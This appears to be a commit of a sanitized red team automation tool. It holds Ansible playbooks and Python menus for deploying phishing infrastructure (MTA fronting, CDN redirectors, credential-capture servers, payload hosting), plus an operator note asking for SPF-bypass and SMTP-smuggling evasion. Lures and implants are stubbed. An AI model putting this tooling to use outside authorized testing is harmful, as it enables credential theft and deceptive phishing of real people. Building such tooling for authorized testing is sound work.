Initial public portfolio release

Sanitized version of red team infrastructure automation platform.
Operational content (implant pipelines, lures, credential capture)
replaced with documented stubs. Architecture and infrastructure
automation code intact.
This commit is contained in:
Operator
2026-06-23 16:12:14 -04:00
commit 98103466d8
239 changed files with 40012 additions and 0 deletions
+127
View File
@@ -0,0 +1,127 @@
phishing/
├── deploy_phishing_infrastructure.yml *Created
├── mta_front.yml *Created
├── gophish_server.yml *Created
├── phishing_redirector.yml *Created
├── phishing_webserver.yml *Created
├── payload_redirector.yml
├── payload_server.yml
└── cleanup_phishing.yml
tasks/
├── configure_mta_front.yml *Created
├── configure_gophish_advanced.yml *Created
├── configure_phishing_redirector.yml *Created
├── configure_phishing_webserver.yml
├── configure_payload_redirector.yml
├── configure_payload_server.yml
└── setup_phishing_security.yml *Created
templates/
├── phishing/
│ ├── gophish-advanced-config.j2
│ ├── postfix-mta-front.j2
│ ├── nginx-phishing-redirector.j2
│ ├── nginx-payload-redirector.j2
│ ├── phishing-landing-page.j2
│ ├── email-templates/
│ │ ├── office365_login.j2 *Created
│ │ ├── password_expiry.j2
│ │ ├── security_alert.j2
│ │ └── file_share.j2
│ └── fedramp-compliance.j2
└── phishing_deployment_state.j2
I am looking to beef up my phishing portion of my tooland I want to make a stand alone option as well. I will be preforming both red team phishing engagements and fed ramp engagements. So the red team ones need to be more advanced and sophesticated with advanced evasion techniques etc like
SMTP smuggling aged domains MTA fronting Cloud service payload hosting CDN exploitation LOtL techniques SPF bypass methods File format manipulation
This will require more than one server
For fedramp style engagements I am not testing email security controls but only the users and I need to follow the strict guideline
The intent is to test user compliance, not email security. Emails should be allow-listed on all security systems and be presented to the user unflagged, unmodified, and unaltered in any way. 3PAOs will provide or approve email templates and landing pages used in testing. 3PAOs must either perform this attack vector themselves, or independently evaluate the effectiveness of a third party phishing campaign. Landing pages for CSP personnel who are victims of the phishing attack should immediately identify that the email was a phish, and provide supplemental information on how to identify phishing attacks in the future. The email campaign will consist of the following:
Email with username in body, Link to landing page, Ability to capture emails opened (hidden pixel), Landing page, Ability to tie landing page visits by user, Username and password capture, Ability to track user submission. FedRAMP requires that the 3PAO report back roles and/or metrics but not specific names. Lets keep with making this CSP agnostic as much as possible so AWS and linode can be used and other CSP as they are added to the framework. I would like everything to be as indepentent as possible so its all not running in one huge file or script and can be easily found and worked on and called to build stand alone servers or add to an existing server etc
For red team engagements I want to be able to deploy my whole red team infra or exactly what I need like just a c2, redirector, payload server, phishing server, Domain fronting server or just payload server, phishing server, Domain fronting server etc. I want an option for red team phishing which deploys
Below are deployment profiles
Profile Name: Full Red Team Infra (All the Things)
Servers:
MTA Front | SMTP relay hides email backend
Gophish Email Server | Phishing campaign controller (hidden)
Phishing Redirector (CDN) | Hides phishing web server behind CDN
Phishing Web Server | Credential capture backend
Payload Redirector (CDN) | Hides malware delivery server behind CDN
Payload Server | Malware hosting backend
C2 Redirector (CDN) | Hides Havoc/Cobalt backend behind CDN
C2 Backend | Command & control server (hidden)
Profile Name: Full Red Team Infra (No CDN Abuse)
Servers:
MTA Front | SMTP relay hides email backend
Gophish Email Server | Phishing campaign controller (hidden)
Phishing Redirector (VPS) | Nginx/socat hides phishing web server
Phishing Web Server | Credential capture backend
Payload Redirector (VPS) | Nginx/socat hides malware delivery server
Payload Server | Malware hosting backend
C2 Redirector (VPS) | Nginx/socat hides C2 backend
C2 Backend | Command & control server (hidden)
Profile Name: Phishing Infra (Credential Harvesting Only)
Servers:
MTA Front (optional) | SMTP relay hides email backend (optional)
Gophish Email Server | Phishing campaign controller
Phishing Redirector (CDN or VPS) | Hides phishing web server
Phishing Web Server | Credential capture backend
Profile Name: Phishing Infra (Credential Harvesting Only, No CDN)
Servers:
MTA Front (optional) | SMTP relay hides email backend (optional)
Gophish Email Server | Phishing campaign controller
Phishing Redirector (VPS) | Nginx/socat hides phishing web server
Phishing Web Server | Credential capture backend
Profile Name: Whitelisted Phishing Infra (User Awareness Testing)
Servers:
Gophish Email Server | Sends phishing campaigns directly
Phishing Web Server | Fake login or failure landing page
this needs to also set up firewall rules or security groups to ensure least privilege. I need only the MTA fronting or redirectors accessible to anyone. The main phishing server should only allow the operator to connect and then the main phishing server should be able to access the MTA, Webserver and payload server etc. We need to ensure that things are fully secure. This should be added to the main menu under the phishing server option 9 with sub menus for the different deployment options. This needs to be deployable in any provider so make as much of it provider agnositic. use existing playbooks if it make sense like security hardening etc. I also want this to have the tracker setup as well on any deployment. Make sure to consider the way the tool is built. I want minimal stuff in the deploy.py. As much as possible should be handled with tasks templates and scripts
NOTES:
- I think I need to remove all the security group stuff to the security_hardening yaml
- I dont think I need a tracker on the webserver yaml
- setup_phishing_security.yml seems redundant and AWS only focused
-
-
+59
View File
@@ -0,0 +1,59 @@
---
# Phishing Infrastructure Cleanup Playbook
- name: Clean up phishing infrastructure
hosts: localhost
gather_facts: false
connection: local
vars_files:
- vars.yaml
vars:
deployment_id: "{{ deployment_id | default('') }}"
confirm_cleanup: "{{ confirm_cleanup | default(true) }}"
tasks:
- name: Load deployment state
include_vars:
file: "phishing_deployment_state_{{ deployment_id }}.json"
register: deployment_state
ignore_errors: yes
- name: Show cleanup information
debug:
msg: |
************************************************
* PHISHING CLEANUP OPERATION *
************************************************
The following resources will be DELETED PERMANENTLY:
- MTA Front: {{ mta_front_name | default('mta-' + deployment_id) }}
- GoPhish Server: {{ gophish_server_name | default('gp-' + deployment_id) }}
- Phishing Web Server: {{ phishing_web_name | default('pw-' + deployment_id) }}
- Phishing Redirector: {{ phishing_redirector_name | default('phr-' + deployment_id) }}
{% if cleanup_payload_infra | default(false) %}
- Payload Server: {{ payload_server_name | default('ps-' + deployment_id) }}
- Payload Redirector: {{ payload_redirector_name | default('pr-' + deployment_id) }}
{% endif %}
when: confirm_cleanup | bool
- name: Confirm cleanup operation
pause:
prompt: "\n>>> Type 'yes' to confirm deletion or press Ctrl+C to abort <<<"
register: confirmation
when: confirm_cleanup | bool
- name: Skip cleanup if not confirmed
meta: end_play
when: confirm_cleanup | bool and confirmation.user_input != 'yes'
- name: Run provider-specific cleanup
include_tasks: "../{{ provider | upper }}/cleanup.yml"
vars:
cleanup_redirector: true
cleanup_c2: true
cleanup_tracker: false
redirector_name: "{{ phishing_redirector_name }}"
c2_name: "{{ gophish_server_name }}"
- name: Remove deployment state file
file:
path: "phishing_deployment_state_{{ deployment_id }}.json"
state: absent
+546
View File
@@ -0,0 +1,546 @@
#!/usr/bin/env python3
"""
Phishing infrastructure deployment module
"""
import os
import sys
import logging
# Add the project root to the path so we can import utils
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from utils.common import (
COLORS, clear_screen, print_banner, generate_deployment_id,
setup_logging, get_public_ip, confirm_action, wait_for_input,
archive_old_logs
)
from utils.provider_utils import select_provider, gather_provider_config
from utils.ssh_utils import generate_ssh_key
from utils.naming_utils import get_deployment_name_with_options
def gather_phishing_parameters():
"""Collect parameters specific to phishing deployments"""
clear_screen()
print_banner()
print(f"{COLORS['WHITE']}PHISHING INFRASTRUCTURE SETUP{COLORS['RESET']}")
print(f"{COLORS['WHITE']}=============================={COLORS['RESET']}")
config = {}
# Generate deployment ID
config['deployment_id'] = generate_deployment_id()
print(f"Deployment ID: {COLORS['CYAN']}{config['deployment_id']}{COLORS['RESET']}")
# Provider selection
provider = select_provider()
if not provider:
return None
config['provider'] = provider
# Get provider-specific configuration
provider_config = gather_provider_config(provider)
if not provider_config:
return None
config.update(provider_config)
# Phishing-specific configuration
print(f"\n{COLORS['BLUE']}Phishing Configuration{COLORS['RESET']}")
# Domain configuration
phishing_domain = input(f"Phishing domain (aged domain recommended) [required]: ")
if not phishing_domain:
print(f"{COLORS['RED']}A domain is required for phishing deployments{COLORS['RESET']}")
return None
# Set all domain variables for compatibility
config['phishing_domain'] = phishing_domain
config['primary_domain'] = phishing_domain # For compatibility with existing playbooks
config['domain'] = phishing_domain # For compatibility
# Subdomain configuration
config['mta_hostname'] = input(f"MTA hostname [default: mail.{phishing_domain}]: ") or f"mail.{phishing_domain}"
config['phishing_hostname'] = input(f"Phishing hostname [default: portal.{phishing_domain}]: ") or f"portal.{phishing_domain}"
# Instance naming
print(f"\n{COLORS['BLUE']}Instance Naming{COLORS['RESET']}")
# MTA Front naming
config['mta_name'] = get_deployment_name_with_options(
deployment_type='phishing',
component_type='MTA Front Server',
default_suffix='mta'
)
# GoPhish server naming
config['gophish_name'] = get_deployment_name_with_options(
deployment_type='phishing',
component_type='GoPhish Server',
default_suffix='gophish'
)
# Phishing redirector naming
config['phishing_redirector_name'] = get_deployment_name_with_options(
deployment_type='phishing',
component_type='Phishing Redirector',
default_suffix='redirector'
)
# Phishing webserver naming
config['phishing_webserver_name'] = get_deployment_name_with_options(
deployment_type='phishing',
component_type='Phishing Webserver',
default_suffix='webserver'
)
# MTA Authentication
config['smtp_auth_user'] = input("SMTP auth username [default: admin]: ") or "admin"
config['smtp_auth_pass'] = input("SMTP auth password [default: random]: ") or None
# GoPhish configuration
config['gophish_admin_port'] = input("GoPhish admin port [default: 8090]: ") or "8090"
# Campaign configuration
config['campaign_name'] = input("Campaign name [default: test-campaign]: ") or "test-campaign"
config['sender_name'] = input("Sender display name [default: IT Support]: ") or "IT Support"
config['sender_email'] = f"noreply@{config['phishing_domain']}"
# Template selection
print(f"\n{COLORS['BLUE']}Email Template Selection:{COLORS['RESET']}")
print(f"1) Office 365 Login")
print(f"2) Password Expiration")
print(f"3) Security Alert")
print(f"4) File Share Notification")
print(f"5) Custom Template")
template_choice = input("Select template [default: 1]: ") or "1"
templates = {
"1": "office365_login",
"2": "password_expiry",
"3": "security_alert",
"4": "file_share",
"5": "custom"
}
config['email_template'] = templates.get(template_choice, "office365_login")
# If custom template, get details
if config['email_template'] == 'custom':
config['custom_template_name'] = input("Custom template name: ")
config['custom_subject'] = input("Email subject line: ")
config['custom_sender'] = input("Sender email/name: ")
# Security settings
print(f"\n{COLORS['BLUE']}Security Settings:{COLORS['RESET']}")
config['enable_credential_harvesting'] = confirm_action("Enable credential harvesting?", default=True)
config['enable_attachment_tracking'] = confirm_action("Enable attachment tracking?", default=True)
config['enable_link_tracking'] = confirm_action("Enable link click tracking?", default=True)
# Email for Let's Encrypt
default_email = f"admin@{config['phishing_domain']}"
config['letsencrypt_email'] = input(f"Email for Let's Encrypt [default: {default_email}]: ") or default_email
# Get operator IP for security
suggested_ip = get_public_ip()
if suggested_ip:
operator_ip = input(f"Your public IP for admin access [detected: {suggested_ip}]: ") or suggested_ip
else:
operator_ip = input("Your public IP for admin access: ")
config['operator_ip'] = operator_ip
# SSH key generation
ssh_key_path = generate_ssh_key(config['deployment_id'])
if not ssh_key_path:
print(f"{COLORS['RED']}Failed to generate SSH key{COLORS['RESET']}")
return None
config['ssh_key_path'] = f"{ssh_key_path}.pub"
# Post-deployment options
config['ssh_after_deploy'] = confirm_action("SSH into instance after deployment?", default=True)
config['open_admin_panel'] = confirm_action("Open GoPhish admin panel after deployment?", default=True)
return config
def phishing_menu():
"""Display the phishing submenu and handle user selection"""
while True:
clear_screen()
print_banner()
print(f"{COLORS['WHITE']}PHISHING INFRASTRUCTURE MENU{COLORS['RESET']}")
print(f"{COLORS['WHITE']}============================{COLORS['RESET']}")
print(f"1) Basic Phishing Setup {COLORS['GREEN']}*RECOMMENDED*{COLORS['RESET']} {COLORS['GRAY']}(MTA + GoPhish){COLORS['RESET']}")
print(f"2) GoPhish Server Only {COLORS['GRAY']}(Campaign management only){COLORS['RESET']}")
print(f"3) Phishing Web Server Only {COLORS['GRAY']}(Landing pages only){COLORS['RESET']}")
print(f"4) MTA Front Server Only {COLORS['GRAY']}(Email sending only){COLORS['RESET']}")
print(f"5) Advanced Phishing Setup {COLORS['GRAY']}(MTA + GoPhish + Redirector){COLORS['RESET']}")
print(f"6) Phishing Redirector Only {COLORS['GRAY']}(Traffic redirection only){COLORS['RESET']}")
print(f"7) Ephemeral MTA Setup {COLORS['GRAY']}(Temporary email infrastructure){COLORS['RESET']}")
print(f"8) Full Phishing Infrastructure {COLORS['GRAY']}(Complete multi-tier setup){COLORS['RESET']}")
print(f"9) FedRAMP Compliant Phishing {COLORS['GRAY']}(Compliance-focused setup){COLORS['RESET']}")
print(f"99) Return to Main Menu")
choice = input(f"\nSelect an option: ")
if choice == "1":
deploy_basic_phishing()
elif choice == "2":
deploy_gophish_only()
elif choice == "3":
deploy_phishing_webserver_only()
elif choice == "4":
deploy_mta_front_only()
elif choice == "5":
deploy_advanced_phishing()
elif choice == "6":
deploy_phishing_redirector_only()
elif choice == "7":
deploy_ephemeral_mta()
elif choice == "8":
deploy_full_phishing()
elif choice == "9":
deploy_fedramp_phishing()
elif choice == "99":
return
else:
print(f"\n{COLORS['RED']}Invalid option. Please try again.{COLORS['RESET']}")
wait_for_input()
def deploy_gophish_only():
"""Deploy GoPhish server only"""
config = gather_phishing_parameters()
if not config:
return
config['deployment_type'] = 'gophish_only'
config['deploy_gophish'] = True
print(f"\n{COLORS['GREEN']}Deploying GoPhish server only...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_mta_front_only():
"""Deploy MTA front server only"""
config = gather_phishing_parameters()
if not config:
return
config['deployment_type'] = 'mta_front_only'
config['deploy_mta_front'] = True
print(f"\n{COLORS['GREEN']}Deploying MTA front server only...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_phishing_webserver_only():
"""Deploy phishing web server only"""
config = gather_phishing_parameters()
if not config:
return
config['deployment_type'] = 'phishing_webserver_only'
config['deploy_phishing_webserver'] = True
print(f"\n{COLORS['GREEN']}Deploying phishing web server only...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_phishing_redirector_only():
"""Deploy phishing redirector only"""
config = gather_phishing_parameters()
if not config:
return
config['deployment_type'] = 'phishing_redirector_only'
config['deploy_phishing_redirector'] = True
print(f"\n{COLORS['GREEN']}Deploying phishing redirector only...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_basic_phishing():
"""Deploy basic phishing setup (MTA + GoPhish)"""
config = gather_phishing_parameters()
if not config:
return
config['deployment_type'] = 'basic_phishing'
config['deploy_mta_front'] = True
config['deploy_gophish'] = True
print(f"\n{COLORS['GREEN']}Deploying basic phishing infrastructure...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_advanced_phishing():
"""Deploy advanced phishing setup (MTA + GoPhish + Redirector)"""
config = gather_phishing_parameters()
if not config:
return
config['deployment_type'] = 'advanced_phishing'
config['deploy_mta_front'] = True
config['deploy_gophish'] = True
config['deploy_phishing_redirector'] = True
print(f"\n{COLORS['GREEN']}Deploying advanced phishing infrastructure...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_full_phishing():
"""Deploy full phishing infrastructure"""
config = gather_phishing_parameters()
if not config:
return
config['deployment_type'] = 'full_phishing'
config['deploy_mta_front'] = True
config['deploy_gophish'] = True
config['deploy_phishing_redirector'] = True
config['deploy_phishing_webserver'] = True
config['deploy_tracker'] = True
print(f"\n{COLORS['GREEN']}Deploying full phishing infrastructure...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_fedramp_phishing():
"""Deploy FedRAMP compliant phishing infrastructure"""
config = gather_phishing_parameters()
if not config:
return
# FedRAMP specific configuration
clear_screen()
print_banner()
print(f"{COLORS['WHITE']}FEDRAMP COMPLIANCE CONFIGURATION{COLORS['RESET']}")
print(f"{COLORS['WHITE']}==================================={COLORS['RESET']}")
# Compliance requirements
print(f"\n{COLORS['BLUE']}FedRAMP Compliance Requirements:{COLORS['RESET']}")
print(f"• Immediate disclosure of phishing attempts")
print(f"• Comprehensive audit logging")
print(f"• Compliance notification requirements")
print(f"• Mandatory log retention")
# Immediate disclosure (required for FedRAMP)
config['immediate_disclosure'] = True
print(f"\n{COLORS['YELLOW']}Immediate disclosure is REQUIRED for FedRAMP compliance{COLORS['RESET']}")
# Authorization reference for documentation
auth_reference = input(f"Authorization reference/ticket number [optional]: ") or "Pre-authorized FedRAMP exercise"
config['authorization_reference'] = auth_reference
# Log retention period
retention_days = input(f"Log retention period in days [default: 90]: ") or "90"
try:
config['log_retention_days'] = int(retention_days)
except ValueError:
config['log_retention_days'] = 90
# Audit logging level
print(f"\n{COLORS['BLUE']}Audit Logging Level:{COLORS['RESET']}")
print(f"1) Basic (Login attempts, email sends)")
print(f"2) Detailed (+ IP addresses, user agents)")
print(f"3) Comprehensive (+ full request logs)")
log_level = input(f"Select logging level [default: 3]: ") or "3"
log_levels = {"1": "basic", "2": "detailed", "3": "comprehensive"}
config['audit_log_level'] = log_levels.get(log_level, "comprehensive")
# Compliance mode settings
config['fedramp_mode'] = True
config['compliance_mode'] = True
config['deployment_type'] = 'fedramp_phishing'
config['deploy_gophish'] = True
config['deploy_phishing_webserver'] = True
config['deploy_tracker'] = True
config['enable_audit_logging'] = True
# Debug options
config['debug_mode'] = confirm_action("Enable debug mode (extra verbose Ansible output)?", default=True)
print(f"\n{COLORS['GREEN']}Deploying FedRAMP compliant phishing infrastructure...{COLORS['RESET']}")
execute_phishing_deployment(config)
def deploy_ephemeral_mta():
"""Deploy ephemeral MTA for high OPSEC phishing"""
config = gather_phishing_parameters()
if not config:
return
# Additional ephemeral MTA configuration
print(f"\n{COLORS['BLUE']}Ephemeral MTA Configuration{COLORS['RESET']}")
print(f"{COLORS['YELLOW']}Note: Ephemeral MTAs are designed for short-term use{COLORS['RESET']}")
config['deployment_type'] = 'ephemeral_mta'
config['ephemeral_mta'] = True
config['deploy_mta_front'] = True
# Auto-destruct timer
auto_destruct = confirm_action("Enable auto-destruct timer?", default=False)
if auto_destruct:
hours = input("Auto-destruct after how many hours [default: 24]: ") or "24"
config['auto_destruct_hours'] = int(hours)
print(f"\n{COLORS['GREEN']}Deploying ephemeral MTA...{COLORS['RESET']}")
execute_phishing_deployment(config)
def execute_phishing_deployment(config):
"""Execute phishing infrastructure deployment"""
clear_screen()
print_banner()
print(f"\n{COLORS['GREEN']}Starting phishing deployment...{COLORS['RESET']}")
# Archive old logs before starting new deployment
print(f"Archiving old logs...")
archive_old_logs(max_logs_to_keep=5) # Keep last 5 deployments
# Set up logging
log_file = setup_logging(config['deployment_id'], "phishing_deployment")
# Display configuration summary
print(f"\n{COLORS['CYAN']}Deployment Summary:{COLORS['RESET']}")
print(f"Deployment Type: {config['deployment_type']}")
print(f"Deployment ID: {config['deployment_id']}")
print(f"Provider: {config['provider']}")
print(f"Domain: {config['phishing_domain']}")
print(f"Email Template: {config.get('email_template', 'N/A')}")
print(f"MTA Hostname: {config.get('mta_hostname', 'N/A')}")
if config.get('fedramp_mode'):
print(f"FedRAMP Mode: {COLORS['YELLOW']}ENABLED{COLORS['RESET']}")
print(f"Authorization Reference: {config.get('authorization_reference', 'N/A')}")
print(f"Audit Level: {config.get('audit_log_level', 'N/A')}")
# Confirm deployment
if not confirm_action(f"\n{COLORS['YELLOW']}Proceed with phishing deployment?{COLORS['RESET']}", default=False):
print(f"\n{COLORS['YELLOW']}Deployment cancelled.{COLORS['RESET']}")
return
# Mark this as a phishing deployment for the deployment engine
config['phishing_deployment'] = True
# Execute the actual deployment using component-based approach
success = execute_component_deployment(config)
if success:
print(f"\n{COLORS['GREEN']}✅ Phishing infrastructure deployed successfully!{COLORS['RESET']}")
if config.get('ssh_after_deploy'):
from utils.ssh_utils import ssh_to_instance
ssh_to_instance(config)
else:
print(f"\n{COLORS['RED']}❌ Phishing infrastructure deployment failed.{COLORS['RESET']}")
wait_for_input()
def execute_component_deployment(config):
"""Execute component-based phishing deployment"""
import subprocess
import os
print(f"\n{COLORS['BLUE']}Executing phishing deployment: {config['deployment_type']}{COLORS['RESET']}")
# Provider directory mapping
provider_dirs = {
"aws": "AWS",
"linode": "Linode",
"flokinet": "FlokiNET"
}
# Component playbook mapping
component_playbooks = {
'deploy_mta_front': os.path.join(os.path.dirname(__file__), 'mta_front.yml'),
'deploy_gophish': os.path.join(os.path.dirname(__file__), '..', '..', 'providers', provider_dirs[config['provider']], 'c2.yml'),
'deploy_phishing_redirector': os.path.join(os.path.dirname(__file__), '..', '..', 'providers', provider_dirs[config['provider']], 'redirector.yml'),
'deploy_phishing_webserver': os.path.join(os.path.dirname(__file__), 'phishing_webserver.yml'),
}
# Build extra vars for ansible as JSON (safe for special chars)
import json as _json
import tempfile as _tempfile
extra_vars_dict = {}
for key, value in config.items():
if isinstance(value, (str, int, bool)):
extra_vars_dict[key] = value
deployed_components = []
try:
# Deploy each enabled component
for component, playbook_path in component_playbooks.items():
if config.get(component, False):
print(f"\n{COLORS['YELLOW']}Deploying {component.replace('deploy_', '')}...{COLORS['RESET']}")
# Check if playbook exists
if not os.path.exists(playbook_path):
print(f"{COLORS['RED']}Error: Playbook not found: {playbook_path}{COLORS['RESET']}")
continue
# Write vars to temp file (avoids CLI exposure)
_vars_file = _tempfile.NamedTemporaryFile(
mode='w', suffix='.json', prefix='phish_vars_',
delete=False
)
_json.dump(extra_vars_dict, _vars_file)
_vars_file.close()
os.chmod(_vars_file.name, 0o600)
# Build ansible command
cmd = [
'ansible-playbook',
playbook_path,
'--extra-vars',
f'@{_vars_file.name}'
]
print(f"{COLORS['GRAY']}Running: ansible-playbook {os.path.basename(playbook_path)}{COLORS['RESET']}")
# Execute playbook
result = subprocess.run(cmd, capture_output=True, text=True, cwd=os.path.dirname(__file__))
# Clean up temp vars file
try:
os.unlink(_vars_file.name)
except OSError:
pass
if result.returncode == 0:
print(f"{COLORS['GREEN']}{component.replace('deploy_', '')} deployed successfully{COLORS['RESET']}")
deployed_components.append(component)
else:
print(f"{COLORS['RED']}{component.replace('deploy_', '')} deployment failed{COLORS['RESET']}")
print(f"{COLORS['RED']}STDERR: {result.stderr}{COLORS['RESET']}")
return False
# Deploy the orchestration playbook to save state
print(f"\n{COLORS['YELLOW']}Saving deployment state...{COLORS['RESET']}")
orchestration_playbook = os.path.join(os.path.dirname(__file__), 'deploy_phishing_infrastructure.yml')
_orch_vars_file = _tempfile.NamedTemporaryFile(
mode='w', suffix='.json', prefix='phish_orch_',
delete=False
)
_json.dump(extra_vars_dict, _orch_vars_file)
_orch_vars_file.close()
os.chmod(_orch_vars_file.name, 0o600)
cmd = [
'ansible-playbook',
orchestration_playbook,
'--extra-vars',
f'@{_orch_vars_file.name}'
]
result = subprocess.run(cmd, capture_output=True, text=True, cwd=os.path.dirname(__file__))
try:
os.unlink(_orch_vars_file.name)
except OSError:
pass
if result.returncode == 0:
print(f"{COLORS['GREEN']}✅ Deployment state saved{COLORS['RESET']}")
return True
else:
print(f"{COLORS['RED']}❌ Failed to save deployment state{COLORS['RESET']}")
print(f"{COLORS['RED']}STDERR: {result.stderr}{COLORS['RESET']}")
return False
except Exception as e:
print(f"{COLORS['RED']}Deployment error: {str(e)}{COLORS['RESET']}")
return False
if __name__ == "__main__":
phishing_menu()
@@ -0,0 +1,155 @@
---
# Main phishing infrastructure deployment playbook
# Handles all deployment types and orchestrates component deployment
- name: Deploy phishing infrastructure
hosts: 127.0.0.1
gather_facts: true # Enable to get ansible_date_time
connection: local
vars:
deployment_id: "{{ deployment_id | default('') }}"
provider: "{{ provider | default('aws') }}"
deployment_type: "{{ deployment_type | default('phishing_only_noccdn') }}"
# Provider directory mapping
provider_dirs:
aws: "AWS"
linode: "Linode"
flokinet: "FlokiNET"
tasks:
- name: Validate deployment configuration
assert:
that:
- deployment_id != ""
- provider != ""
- deployment_type != ""
fail_msg: "Missing required deployment parameters"
- name: Display deployment information
debug:
msg:
- "Phishing Infrastructure Deployment"
- "=================================="
- "Deployment ID: {{ deployment_id }}"
- "Provider: {{ provider }}"
- "Deployment Type: {{ deployment_type }}"
- "Phishing Domain: {{ phishing_domain | default('N/A') }}"
# Phase 1: Deploy core infrastructure components
# Note: This playbook is orchestrated by deploy_phishing.py which calls individual provider playbooks
# The actual infrastructure deployment is handled by provider-specific playbooks:
# - providers/AWS/c2.yml for GoPhish/C2 servers
# - providers/AWS/redirector.yml for redirectors
# - providers/Linode/c2.yml, providers/Linode/redirector.yml for Linode
# - modules/phishing/mta_front.yml for MTA front servers
- name: Deploy MTA Front server
debug:
msg: "🚀 Executing MTA Front deployment: mta_front.yml with server_name=mta-{{ deployment_id }}"
when: deploy_mta_front | default(false) | bool
- name: Deploy Gophish server
debug:
msg: "🚀 Executing Gophish C2 deployment: ../../providers/{{ provider }}/c2.yml with c2_name=gophish-{{ deployment_id }}"
when: deploy_gophish | default(false) | bool
- name: Deploy phishing redirector
debug:
msg: "🚀 Executing redirector deployment: ../../providers/{{ provider }}/redirector.yml with redirector_name=redirector-{{ deployment_id }}"
when: deploy_phishing_redirector | default(false) | bool
- name: Deploy phishing web server
debug:
msg: "🚀 Executing web server deployment: phishing_webserver.yml with server_name=web-{{ deployment_id }}"
when: deploy_phishing_webserver | default(false) | bool
# Optional payload infrastructure - commented out for basic phishing deployments
# - name: Deploy payload redirector
# debug:
# msg:
# - "🔧 Payload redirector deployment"
# - "Server Name: payload-redir-{{ deployment_id }}"
# - "✅ Executes: providers/{{ provider }}/redirector.yml"
# when: deploy_payload_redirector | default(false) | bool
# - name: Deploy payload server
# debug:
# msg:
# - "🔧 Payload server deployment"
# - "Server Name: payload-{{ deployment_id }}"
# - "✅ Executes: modules/payload-server/tasks/configure_payload_server.yml"
# when: deploy_payload_server | default(false) | bool
# Phase 2: Deploy C2 infrastructure if requested (optional)
# - name: Deploy C2 redirector
# debug:
# msg:
# - "🔧 C2 redirector deployment"
# - "Server Name: c2-redir-{{ deployment_id }}"
# - "✅ Executes: providers/{{ provider }}/redirector.yml"
# when: deploy_c2_redirector | default(false) | bool
# - name: Deploy C2 backend
# debug:
# msg:
# - "🔧 C2 backend deployment"
# - "Server Name: c2-backend-{{ deployment_id }}"
# - "✅ Executes: providers/{{ provider }}/c2.yml"
# when: deploy_c2_backend | default(false) | bool
# Phase 3: Configure security groups and firewall rules
- name: Configure phishing security
include_tasks: "tasks/setup_phishing_security.yml"
vars:
deployment_components:
mta_front: "{{ deploy_mta_front | default(false) }}"
gophish: "{{ deploy_gophish | default(false) }}"
phishing_redirector: "{{ deploy_phishing_redirector | default(false) }}"
phishing_webserver: "{{ deploy_phishing_webserver | default(false) }}"
payload_redirector: "{{ deploy_payload_redirector | default(false) }}"
payload_server: "{{ deploy_payload_server | default(false) }}"
when: false # Disable for now since security task doesn't exist
# Phase 4: Save deployment state
- name: Ensure logs directory exists
file:
path: "../../logs"
state: directory
mode: '0755'
- name: Save phishing deployment state
template:
src: "templates/phishing_deployment_state.j2"
dest: "{{ playbook_dir }}/logs/phishing_deployment_{{ deployment_id }}.json"
mode: '0600'
vars:
deployment_components:
mta_front: "{{ deploy_mta_front | default(false) }}"
gophish: "{{ deploy_gophish | default(false) }}"
phishing_redirector: "{{ deploy_phishing_redirector | default(false) }}"
phishing_webserver: "{{ deploy_phishing_webserver | default(false) }}"
payload_redirector: "{{ deploy_payload_redirector | default(false) }}"
payload_server: "{{ deploy_payload_server | default(false) }}"
deployment_info:
deployment_id: "{{ deployment_id }}"
deployment_type: "{{ deployment_type }}"
provider: "{{ provider }}"
components: "{{ deployment_components }}"
domains:
phishing: "{{ phishing_domain | default('N/A') }}"
created: "{{ ansible_date_time.iso8601 }}"
ignore_errors: true # Continue if template fails
- name: Display deployment summary
debug:
msg:
- "Phishing Infrastructure Deployment Complete!"
- "==========================================="
- "Deployment Type: {{ deployment_type }}"
- "Phishing Domain: {{ phishing_domain }}"
- "Components Deployed:"
- " - GoPhish: {{ deploy_gophish | default(false) }}"
- " - MTA Front: {{ deploy_mta_front | default(false) }}"
- " - Web Server: {{ deploy_phishing_webserver | default(false) }}"
- "Campaign ready to configure!"
when: not disable_summary | default(false)
@@ -0,0 +1,15 @@
class OPSECGoPhish:
def __init__(self):
self.use_gophish_for = ['email_sending', 'template_management']
self.use_custom_for = ['tracking', 'credential_capture', 'reporting']
def send_campaign(self, targets, template):
# Use GoPhish SMTP capabilities
campaign = self.create_minimal_campaign(targets, template)
# But replace tracking with custom implementation
campaign.tracking_url = self.custom_tracker.generate_url()
campaign.landing_page = self.custom_landing.generate()
# Store results in encrypted, distributed storage
self.secure_storage.initialize(campaign.id)
@@ -0,0 +1,198 @@
---
# Advanced Gophish configuration with enhanced evasion and features
- name: Create Gophish user
user:
name: gophish
system: yes
shell: /bin/bash
home: /opt/gophish
create_home: yes
- name: Download latest Gophish release
get_url:
url: "https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip"
dest: /tmp/gophish.zip
mode: '0644'
- name: Extract Gophish
unarchive:
src: /tmp/gophish.zip
dest: /opt/gophish
owner: gophish
group: gophish
remote_src: yes
- name: Install additional packages for advanced features
apt:
name:
- nginx
- certbot
- python3-certbot-nginx
- sqlite3
- jq
- curl
- wget
- php-fpm
- php-sqlite3
- nodejs
- npm
state: present
- name: Configure advanced Gophish settings
template:
src: "../templates/phishing/gophish-advanced-config.j2"
dest: /opt/gophish/config.json
owner: gophish
group: gophish
mode: '0600'
- name: Create enhanced email templates directory
file:
path: /opt/gophish/templates/{{ item }}
state: directory
owner: gophish
group: gophish
mode: '0755'
loop:
- email
- landing
- static
- name: Deploy email templates
template:
src: "../templates/phishing/email-templates/{{ item }}.j2"
dest: "/opt/gophish/templates/email/{{ item }}.html"
owner: gophish
group: gophish
mode: '0644'
loop:
- office365_login
- password_expiry
- security_alert
- file_share
when: not fedramp_mode | default(false) | bool
- name: Deploy FedRAMP compliant templates
template:
src: "../templates/phishing/fedramp-compliance.j2"
dest: "/opt/gophish/templates/email/fedramp_template.html"
owner: gophish
group: gophish
mode: '0644'
when: fedramp_mode | default(false) | bool
- name: Create advanced landing pages
template:
src: "../templates/phishing/phishing-landing-page.j2"
